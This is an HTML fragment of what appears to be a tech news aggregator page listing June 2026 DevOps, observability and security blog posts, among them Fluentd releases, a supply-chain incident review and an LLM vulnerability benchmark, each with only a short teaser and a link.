        <a href="#h3-top-sentry-alternatives-to-improve-error-management-and-system-insights" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Top Sentry Alternatives to Improve Error Management And System Insights
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-top-sentry-alternatives-to-improve-error-management-and-system-insights"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Explore the best Sentry alternatives that unify error tracking, logs, and metrics to improve incident response and reduce alert fatigue for engineering teams.</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/observability/sentry-alternatives"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-celebrating-pride-and-community-across-our-global-teams" class="group relative scroll-mt-24">
        <a href="#h3-celebrating-pride-and-community-across-our-global-teams" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Celebrating Pride and Community Across Our Global Teams
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-celebrating-pride-and-community-across-our-global-teams"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Explore how New Relic drives LGBTQIA+ inclusion through global community impact and a perfect Human Rights Campaign score.</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/news/celebrating-pride-and-community"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-fluent-package-v604-has-been-released" class="group relative scroll-mt-24">
        <a href="#h3-fluent-package-v604-has-been-released" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 fluent-package v6.0.4 has been released
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-fluent-package-v604-has-been-released"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Hi users! We have released fluent-package v6.0.4 on 2026-06-26. Fluent Package is a stable distribution package of Fluentd. (successor of td-agent) This is a maintenance release of v6.0.x LTS series. </p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 Fluentd Blog</strong></p>
<p><a href="https://www.fluentd.org/blog/fluent-package-v6.0.4-has-been-released"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-grafana-131-release-observability-as-code-updates-extending-grafana-assistant-across-more-data-sources-and-more" class="group relative scroll-mt-24">
        <a href="#h3-grafana-131-release-observability-as-code-updates-extending-grafana-assistant-across-more-data-sources-and-more" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Grafana 13.1 release: observability as code updates, extending Grafana Assistant across more data sources, and more
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-grafana-131-release-observability-as-code-updates-extending-grafana-assistant-across-more-data-sources-and-more"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Earlier this year, Grafana 13 laid the groundwork for making it easier and faster than ever to turn your data into actionable insights. With our latest minor release, Grafana 13.1, we&#39;re building on t</p>
<p><strong>📅 Jun 24, 2026</strong> • <strong>📰 Grafana Blog</strong></p>
<p><a href="https://grafana.com/blog/grafana-13-1-release-all-the-latest-features/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-dont-wrap-opentelemetry-youre-probably-hurting-more-than-helping" class="group relative scroll-mt-24">
        <a href="#h3-dont-wrap-opentelemetry-youre-probably-hurting-more-than-helping" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Don't Wrap OpenTelemetry — You're Probably Hurting More Than Helping
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-dont-wrap-opentelemetry-youre-probably-hurting-more-than-helping"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>There’s a pattern I’ve seen across many teams adopting OpenTelemetry, and it’s well-intentioned every single time. An engineer wants to make things easier for the team. They build a thin abstraction o</p>
<p><strong>📅 Jun 24, 2026</strong> • <strong>📰 OpenTelemetry Blog</strong></p>
<p><a href="https://opentelemetry.io/blog/2026/dont-wrap-opentelemetry/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-post-incident-review-for-tanstack-npm-supply-chain-ransom-incident-no-unauthorized-access-to-customer-production-systems" class="group relative scroll-mt-24">
        <a href="#h3-post-incident-review-for-tanstack-npm-supply-chain-ransom-incident-no-unauthorized-access-to-customer-production-systems" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Post-incident review for TanStack npm supply chain ransom incident: No unauthorized access to customer production systems
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-post-incident-review-for-tanstack-npm-supply-chain-ransom-incident-no-unauthorized-access-to-customer-production-systems"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>On May 27, we completed our internal investigation of the recent TanStack supply chain ransom incident and confirmed our initial findings: The incident was strictly limited to Grafana Labs&#39; GitHub env</p>
<p><strong>📅 Jun 23, 2026</strong> • <strong>📰 Grafana Blog</strong></p>
<p><a href="https://grafana.com/blog/post-incident-review-for-tanstack-npm-supply-chain-ransom-incident/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-introducing-new-relic-preflight-for-ai-coding-observability" class="group relative scroll-mt-24">
        <a href="#h3-introducing-new-relic-preflight-for-ai-coding-observability" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Introducing New Relic Preflight for AI Coding Observability
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-introducing-new-relic-preflight-for-ai-coding-observability"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Understand where your AI spends time, catch problems before they compound, and keep your workflow moving.</p>
<p><strong>📅 Jun 23, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/news/introducing-ai-coding-observability"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-building-and-running-custom-code-transformations-without-leaving-your-editor" class="group relative scroll-mt-24">
        <a href="#h3-building-and-running-custom-code-transformations-without-leaving-your-editor" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Building and running custom code transformations without leaving your editor
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-building-and-running-custom-code-transformations-without-leaving-your-editor"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Custom code transformations are the work that no off-the-shelf migrator covers for you. Moving your services off an internal library, enforcing your team’s error-handling conventions, standardizing lo</p>
<p><strong>📅 Jun 22, 2026</strong> • <strong>📰 AWS DevOps Blog</strong></p>
<p><a href="https://aws.amazon.com/blogs/devops/building-and-running-custom-code-transformations-without-leaving-your-editor/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-security" class="group relative scroll-mt-24">
        <a href="#h2-security" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔐 Security
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-security"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="group relative scroll-mt-24">
        <a href="#h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Threats Making WAVs - Incident Response to a Cryptomining Attack
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-threats-making-wavs-incident-response-to-a-cryptomining-attack"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Guardicore security researchers describe and uncover a full analysis of a cryptomining attack, which hid a cryptominer inside WAV files. The report includes the full attack vectors, from detection, in</p>
<p><strong>📅 Jun 29, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/threats-making-wavs-incident-reponse-cryptomining-attack"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-snyk-vulnbench-js-10-can-llms-find-the-same-bugs-twice" class="group relative scroll-mt-24">
        <a href="#h3-snyk-vulnbench-js-10-can-llms-find-the-same-bugs-twice" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Snyk VulnBench JS 1.0: Can LLMs Find the Same Bugs Twice?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-snyk-vulnbench-js-10-can-llms-find-the-same-bugs-twice"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Snyk VulnBench JS 1.0: 300 repeated scans show LLM security findings vary by run, while SAST and models catch different vulnerability gaps.</p>
<p><strong>📅 Jun 29, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/snyk-vulnbench-js-1-0-llm-security-review-repeatability/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-what-does-eu-ai-act-compliance-require" class="group relative scroll-mt-24">
        <a href="#h3-what-does-eu-ai-act-compliance-require" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What Does EU AI Act Compliance Require?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-what-does-eu-ai-act-compliance-require"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Learn what EU AI Act compliance requires at each risk tier, key deadlines through 2027, and how engineering teams can operationalize AI governance.</p>
<p><strong>📅 Jun 27, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/eu-ai-act-compliance/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-from-phishing-to-vishing-why-devsecops-must-rethink-communication-security" class="group relative scroll-mt-24">
        <a href="#h3-from-phishing-to-vishing-why-devsecops-must-rethink-communication-security" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From Phishing to Vishing: Why DevSecOps Must Rethink Communication Security
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-from-phishing-to-vishing-why-devsecops-must-rethink-communication-security"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Key Takeaways: Vishing is the new frontline threat: Attackers are shifting from emails to phone-based scams, using AI and social engineering to bypass traditional security controls. DevSecOps must exp</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/from-phishing-to-vishing-why-devsecops-must-rethink-communication-security/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-friday-five-june-26-2026" class="group relative scroll-mt-24">
        <a href="#h3-friday-five-june-26-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Friday Five — June 26, 2026
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-friday-five-june-26-2026"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>IBM, Red Hat and Palo Alto Networks Expand Project Lightwell to Help Organizations Respond to Software VulnerabilitiesRed Hat, IBM, and Palo Alto Networks have expanded Project Lightwell to combat AI-</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/friday-five-june-26-2026-red-hat"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-empower-your-ai-tools-with-new-agent-skills-for-red-hat-enterprise-linux" class="group relative scroll-mt-24">
        <a href="#h3-empower-your-ai-tools-with-new-agent-skills-for-red-hat-enterprise-linux" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Empower your AI tools with new agent skills for Red Hat Enterprise Linux
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-empower-your-ai-tools-with-new-agent-skills-for-red-hat-enterprise-linux"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AI tools are transforming how system administrators and developers manage their infrastructure, but when using generic AI assistants to troubleshoot Red Hat Enterprise Linux (RHEL) systems, the advice</p>
<p><strong>📅 Jun 26, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/empower-your-ai-tools-new-agent-skills-red-hat-enterprise-linux"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-openai-gpt-openai-gpt-oss-and-nvidia-nemotron-models-on-amazon-bedrock-receive-fedramp-high-and-dod-il-45-approval-in-aws-govcloud-us" class="group relative scroll-mt-24">
        <a href="#h3-openai-gpt-openai-gpt-oss-and-nvidia-nemotron-models-on-amazon-bedrock-receive-fedramp-high-and-dod-il-45-approval-in-aws-govcloud-us" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 OpenAI GPT, OpenAI GPT OSS, and NVIDIA Nemotron models on Amazon Bedrock receive FedRAMP High and DoD IL-4/5 approval in AWS GovCloud (US)
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-openai-gpt-openai-gpt-oss-and-nvidia-nemotron-models-on-amazon-bedrock-receive-fedramp-high-and-dod-il-45-approval-in-aws-govcloud-us"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>OpenAI GPT, OpenAI GPT OSS, and NVIDIA Nemotron models are now FedRAMP High and Department of Defense Cloud Computing Security Requirements Guide (DoD CC SRG) Impact Level (IL) 4 and 5 approved within</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/addl-bedrock-model-fedramp-il-5-govcloud"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-nvd-in-the-ai-era-the-case-for-multi-source-vulnerability-intelligence" class="group relative scroll-mt-24">
        <a href="#h3-nvd-in-the-ai-era-the-case-for-multi-source-vulnerability-intelligence" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 NVD in the AI Era: The Case for Multi-Source Vulnerability Intelligence
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-nvd-in-the-ai-era-the-case-for-multi-source-vulnerability-intelligence"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>NIST’s shift to risk-based enrichment makes one thing clear: modern security teams need more than a single public source. In the AI era, trusted vulnerability intelligence depends on multiple signals,</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/nvd-multi-source-vulnerability-intelligence/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-from-alert-fatigue-to-automated-action-automated-patching-in-the-ai-era" class="group relative scroll-mt-24">
        <a href="#h3-from-alert-fatigue-to-automated-action-automated-patching-in-the-ai-era" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From alert fatigue to automated action: Automated patching in the AI era
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-from-alert-fatigue-to-automated-action-automated-patching-in-the-ai-era"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AI models are outpacing human-scale security operations. AI can surface vulnerabilities across major systems faster than teams can act, and most organizations lack the patching capacity to keep up. Th</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/alert-fatigue-automated-action-automated-patching-ai-era"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-fluentd-v1193-has-been-released" class="group relative scroll-mt-24">
        <a href="#h3-fluentd-v1193-has-been-released" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Fluentd v1.19.3 has been released
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-fluentd-v1193-has-been-released"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Hi users! We have released v1.19.3 on 2026-06-25. ChangeLog is here. This release is a maintenance release of v1.19 series. This release is bundled for fluent-package LTS version v6.0.4! Security Fixe</p>
<p><strong>📅 Jun 25, 2026</strong> • <strong>📰 Fluentd Blog</strong></p>
<p><a href="https://www.fluentd.org/blog/fluentd-v1.19.3-has-been-released"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-a-note-to-our-customers-and-partners" class="group relative scroll-mt-24">
        <a href="#h3-a-note-to-our-customers-and-partners" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 A Note to Our Customers and Partners
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-a-note-to-our-customers-and-partners"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>A note to our customers and partners about Snyk&#39;s AI transformation and organizational changes.</p>
<p><strong>📅 Jun 24, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/a-note-to-our-customers-and-partners/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-what-is-an-sbom-and-why-cant-you-ship-without-one" class="group relative scroll-mt-24">
        <a href="#h3-what-is-an-sbom-and-why-cant-you-ship-without-one" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What is an SBOM (and Why Can’t You Ship Without One)?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-what-is-an-sbom-and-why-cant-you-ship-without-one"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
